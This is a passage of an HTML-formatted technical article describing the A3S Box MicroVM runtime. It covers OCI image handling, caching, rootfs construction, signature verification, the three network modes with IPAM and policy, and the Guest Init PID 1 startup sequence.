    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;tag&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// e.g., "latest"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;digest&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// e.g., "sha256:abc..."&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Parsing rules are compatible with Docker conventions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;nginx&lt;/code&gt; -&amp;gt; &lt;code&gt;registry-1.docker.io/library/nginx:latest&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;myuser/myapp:v2&lt;/code&gt; -&amp;gt; &lt;code&gt;registry-1.docker.io/myuser/myapp:v2&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ghcr.io/org/tool:main&lt;/code&gt; -&amp;gt; kept as-is&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;registry.example.com/app@sha256:abc...&lt;/code&gt; -&amp;gt; digest reference&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  12.3 Multi-Architecture Image Resolution
&lt;/h3&gt;

&lt;p&gt;Modern container images are typically multi-architecture — the same tag contains variants for multiple platforms like amd64 and arm64. A3S Box's &lt;code&gt;linux_platform_resolver&lt;/code&gt; automatically selects the variant matching the host architecture:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;OS is fixed to &lt;code&gt;linux&lt;/code&gt; (MicroVM always runs a Linux kernel internally)&lt;/li&gt;
&lt;li&gt;Architecture mapping: &lt;code&gt;x86_64&lt;/code&gt; -&amp;gt; &lt;code&gt;amd64&lt;/code&gt;, &lt;code&gt;aarch64&lt;/code&gt; -&amp;gt; &lt;code&gt;arm64&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This means even when developing on an Apple Silicon Mac, A3S Box will automatically pull the arm64 variant of the image.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.4 Caching and Deduplication
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;ImageStore&lt;/code&gt; implements two-level cache lookup:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Lookup by reference&lt;/strong&gt;: Exact match on &lt;code&gt;registry/repository:tag&lt;/code&gt;, for repeated pulls of the same image&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lookup by digest&lt;/strong&gt;: Deduplication via SHA-256 content hash, avoiding duplicate storage when different tags point to the same content&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Cache configuration (&lt;code&gt;CacheConfig&lt;/code&gt;):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;enabled&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Whether to enable caching&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;cache_dir&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;~/.a3s/cache&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cache directory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;max_rootfs_entries&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Maximum rootfs cache entries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;max_cache_bytes&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10 GB&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Maximum total cache size&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When the cache exceeds limits, LRU (Least Recently Used) strategy evicts the least recently used entries.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.5 Rootfs Construction
&lt;/h3&gt;

&lt;p&gt;From an OCI image to a root filesystem usable by a MicroVM, &lt;code&gt;OciRootfsBuilder&lt;/code&gt; performs the following steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Layer extraction&lt;/strong&gt;: Decompress OCI image layers in order, handling whiteout files (&lt;code&gt;.wh.&lt;/code&gt; prefix) to implement inter-layer file deletion&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Base filesystem injection&lt;/strong&gt;: Create base files required for MicroVM operation:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/etc/passwd&lt;/code&gt;: Contains &lt;code&gt;root&lt;/code&gt; and &lt;code&gt;nobody&lt;/code&gt; users&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/group&lt;/code&gt;: Basic user groups&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/hosts&lt;/code&gt;: localhost mapping&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/resolv.conf&lt;/code&gt;: DNS configuration (default &lt;code&gt;8.8.8.8&lt;/code&gt;, &lt;code&gt;8.8.4.4&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/etc/nsswitch.conf&lt;/code&gt;: Name service switch configuration&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Directory structure creation&lt;/strong&gt;: Ensure &lt;code&gt;/dev&lt;/code&gt;, &lt;code&gt;/proc&lt;/code&gt;, &lt;code&gt;/sys&lt;/code&gt;, &lt;code&gt;/tmp&lt;/code&gt;, &lt;code&gt;/etc&lt;/code&gt;, &lt;code&gt;/workspace&lt;/code&gt;, &lt;code&gt;/run&lt;/code&gt; directories exist&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Guest Layout configuration&lt;/strong&gt;: Set path mappings for &lt;code&gt;workspace_dir&lt;/code&gt;, &lt;code&gt;tmp_dir&lt;/code&gt;, &lt;code&gt;run_dir&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  12.6 Image Signature Verification
&lt;/h3&gt;

&lt;p&gt;A3S Box provides an image signature verification framework, controlling verification behavior through &lt;code&gt;SignaturePolicy&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;SignaturePolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Skip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Skip verification (default)&lt;/span&gt;
    &lt;span class="n"&gt;RequireSigned&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Require signature&lt;/span&gt;
    &lt;span class="nf"&gt;Custom&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="c1"&gt;// Custom policy&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;VerifyResult&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;             &lt;span class="c1"&gt;// Signature valid&lt;/span&gt;
    &lt;span class="n"&gt;NoSignature&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// No signature&lt;/span&gt;
    &lt;span class="nf"&gt;Failed&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="c1"&gt;// Verification failed&lt;/span&gt;
    &lt;span class="n"&gt;Skip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Verification skipped&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The default policy is &lt;code&gt;Skip&lt;/code&gt;, allowing users to use the system normally without configuring signature infrastructure. In production environments, enabling &lt;code&gt;RequireSigned&lt;/code&gt; is recommended to ensure only signature-verified images are run.&lt;/p&gt;

&lt;h3&gt;
  
  
  12.7 Image Pushing
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;RegistryPusher&lt;/code&gt; supports pushing locally built OCI image layouts to remote registries, returning &lt;code&gt;PushResult&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;PushResult&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;config_url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// URL of the config blob&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;manifest_url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// URL of the manifest&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The push flow follows the OCI Distribution Spec: upload config blob and layer blobs first, then upload the manifest.&lt;/p&gt;




&lt;h2&gt;
  
  
  13. Network Architecture: Three Flexible Modes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  13.1 Network Mode Overview
&lt;/h3&gt;

&lt;p&gt;MicroVM network configuration requires balancing security, performance, and ease of use. A3S Box provides three network modes covering different scenarios from development to production:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;NetworkMode&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Tsi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                        &lt;span class="c1"&gt;// Default: transparent socket proxy&lt;/span&gt;
    &lt;span class="n"&gt;Bridge&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;network&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="c1"&gt;// Bridge: real network interface&lt;/span&gt;
    &lt;span class="nb"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                       &lt;span class="c1"&gt;// No networking&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  13.2 TSI Mode (Default)
&lt;/h3&gt;

&lt;p&gt;TSI (Transparent Socket Interception) is A3S Box's default network mode. In this mode, socket syscalls inside the MicroVM are transparently proxied to the host — the MicroVM doesn't need its own network interface, IP address, or routing table.&lt;/p&gt;

&lt;p&gt;How it works:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Inside MicroVM                  Host
+--------------+              +--------------+
| App calls    |              |              |
| connect()    |---- vsock --&amp;gt;| Proxy connect()|---&amp;gt; Target server
| send()       |---- vsock --&amp;gt;| Proxy send()  |---&amp;gt;
| recv()       |&amp;lt;--- vsock ---| Proxy recv()  |&amp;lt;---
+--------------+              +--------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;TSI advantages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Zero configuration&lt;/strong&gt;: No need to create networks, assign IPs, configure routes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure&lt;/strong&gt;: MicroVM has no direct network interface, reducing attack surface&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simple&lt;/strong&gt;: Suitable for most development and testing scenarios&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;TSI limitations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Does not support direct communication between MicroVMs&lt;/li&gt;
&lt;li&gt;Does not support listening on ports (inbound connections require port mapping)&lt;/li&gt;
&lt;li&gt;Slightly lower performance than bridge mode (extra proxy layer)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  13.3 Bridge Mode
&lt;/h3&gt;

&lt;p&gt;Bridge mode provides MicroVMs with a real network interface (&lt;code&gt;eth0&lt;/code&gt;), implementing a userspace network stack via the &lt;code&gt;passt&lt;/code&gt; daemon. This mode is suitable for scenarios requiring inter-MicroVM communication or full network functionality.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;MicroVM A                     Host                        MicroVM B
+----------+                +---------+                +----------+
| eth0     |                | PasstMgr|                | eth0     |
| 10.0.1.2 |&amp;lt;-- virtio --&amp;gt;| Bridge  |&amp;lt;-- virtio --&amp;gt;| 10.0.1.3 |
+----------+                +---------+                +----------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Bridge mode network configuration is injected into Guest Init via environment variables:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Environment Variable&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_NET_IP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;MicroVM IP address&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10.0.1.2/24&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_NET_GATEWAY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Gateway address&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10.0.1.1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_NET_DNS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;DNS server&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8.8.8.8&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Guest Init configures the network interface at startup via raw syscalls (no dependency on &lt;code&gt;iproute2&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  13.4 Network Configuration and IPAM
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;NetworkConfig&lt;/code&gt; defines a complete network:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;NetworkConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;subnet&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// CIDR format, e.g., "10.0.1.0/24"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;gateway&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Ipv4Addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Gateway address&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;driver&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Default "bridge"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;labels&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;endpoints&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;NetworkEndpoint&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;policy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;NetworkPolicy&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;created_at&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;DateTime&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Utc&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The IPAM (IP Address Management) module handles automatic IP address allocation:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;IPv4 IPAM&lt;/strong&gt; (&lt;code&gt;Ipam&lt;/code&gt;): Allocates sequentially from CIDR, skipping network address, gateway address, and broadcast address. Supports subnets with prefix length &amp;lt;= 30.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;IPv6 IPAM&lt;/strong&gt; (&lt;code&gt;Ipam6&lt;/code&gt;): Supports IPv6 subnets with prefix length 64-120.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;MAC address generation uses a Docker-compatible deterministic algorithm: derived from the IP address, using the &lt;code&gt;02:42:xx:xx:xx:xx&lt;/code&gt; prefix. This ensures the same IP always maps to the same MAC address, avoiding ARP cache inconsistency issues.&lt;/p&gt;

&lt;h3&gt;
  
  
  13.5 Network Policy
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;NetworkPolicy&lt;/code&gt; provides inter-MicroVM network isolation control:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;NetworkPolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;isolation&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;IsolationMode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;ingress&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;PolicyRule&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;egress&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;PolicyRule&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;IsolationMode&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// Default: all MicroVMs can communicate with each other&lt;/span&gt;
    &lt;span class="n"&gt;Strict&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Full isolation: prohibit inter-MicroVM communication&lt;/span&gt;
    &lt;span class="n"&gt;Custom&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Custom: rule-based access control&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;PolicyRule&lt;/code&gt; supports flexible rule definitions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;PolicyRule&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;from&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;         &lt;span class="c1"&gt;// Source (supports wildcard "*")&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Destination&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;ports&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u16&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;      &lt;span class="c1"&gt;// Port list&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;protocol&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;// "tcp" / "udp" / "any"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;PolicyAction&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// Allow / Deny&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Custom mode uses first-match-wins rule evaluation, with default deny for unmatched traffic.&lt;/p&gt;

&lt;h3&gt;
  
  
  13.6 DNS Discovery
&lt;/h3&gt;

&lt;p&gt;In Bridge mode, MicroVMs in the same network can discover each other by DNS name. &lt;code&gt;NetworkConfig&lt;/code&gt; provides two key methods:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;peer_endpoints()&lt;/code&gt;: Returns all endpoints in the same network except itself&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;allowed_peer_endpoints()&lt;/code&gt;: Applies network policy filtering on top of &lt;code&gt;peer_endpoints()&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This makes service discovery in microservice architectures simple — each MicroVM can find other services in the same network by name.&lt;/p&gt;

&lt;h3&gt;
  
  
  13.7 None Mode
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;None&lt;/code&gt; mode completely disables networking — the MicroVM has no network interfaces and cannot perform any network communication. This is suitable for pure compute workloads (such as data processing, cryptographic operations), or scenarios with extreme security requirements needing complete network isolation.&lt;/p&gt;




&lt;h2&gt;
  
  
  14. Guest Init: PID 1 Inside the MicroVM
&lt;/h2&gt;

&lt;h3&gt;
  
  
  14.1 Why a Custom PID 1?
&lt;/h3&gt;

&lt;p&gt;In traditional Linux systems, PID 1 is typically systemd or SysVinit — responsible for mounting filesystems, starting services, and managing process lifecycles. But these general-purpose init systems are too large for MicroVMs: systemd itself has millions of lines of code, introducing unnecessary complexity and attack surface.&lt;/p&gt;

&lt;p&gt;A3S Box's &lt;code&gt;a3s-box-guest-init&lt;/code&gt; is a minimal PID 1 designed specifically for MicroVMs. It is compiled as a statically linked Rust binary with no dependency on any dynamic libraries (libc, libssl, etc.), minimizing attack surface and startup time.&lt;/p&gt;

&lt;h3&gt;
  
  
  14.2 Startup Sequence in Detail
&lt;/h3&gt;

&lt;p&gt;Guest Init's startup sequence is a carefully orchestrated 12-step process:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Step 1]  Mount base filesystems
          +-- /proc  (procfs)   -- process information
          +-- /sys   (sysfs)    -- kernel/device information
          +-- /dev   (devtmpfs) -- device nodes
          Note: ignore EBUSY errors (kernel may have pre-mounted)

[Step 2]  Mount virtio-fs shared filesystem
          +-- /workspace -- rootfs passed in from host
          +-- User volumes -- configured via BOX_VOL_&amp;lt;index&amp;gt;=&amp;lt;tag&amp;gt;:&amp;lt;guest_path&amp;gt;[:ro]

[Step 3]  Mount tmpfs
          +-- Configured via BOX_TMPFS_&amp;lt;index&amp;gt;=&amp;lt;path&amp;gt;[:&amp;lt;options&amp;gt;]

[Step 4]  Configure guest networking
          +-- configure_guest_network()
              +-- TSI mode: no configuration needed
              +-- Bridge mode: configure eth0 via raw syscalls

[Step 5]  Read-only rootfs (optional)
          +-- If BOX_READONLY=1, remount rootfs as read-only

[Step 6]  Register signal handlers
          +-- SIGTERM -&amp;gt; set SHUTDOWN_REQUESTED (AtomicBool)

[Step 7]  Parse execution configuration
          +-- BOX_EXEC_EXEC    -- executable path
          +-- BOX_EXEC_ARGC    -- argument count
          +-- BOX_EXEC_ARG_&amp;lt;n&amp;gt; -- each argument
          +-- BOX_EXEC_ENV_*   -- environment variables
          +-- BOX_EXEC_WORKDIR -- working directory

[Step 8]  Start container process
          +-- namespace::spawn_isolated()

[Step 9]  Start Exec server thread
          +-- vsock port 4089

[Step 10] Start PTY server thread
          +-- vsock port 4090

[Step 11] Start Attestation server thread (TEE mode only)
          +-- vsock port 4091

[Step 12] Enter main loop
          +-- Reap zombie processes + handle SIGTERM
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  14.3 Process Isolation Strategy
&lt;/h3&gt;

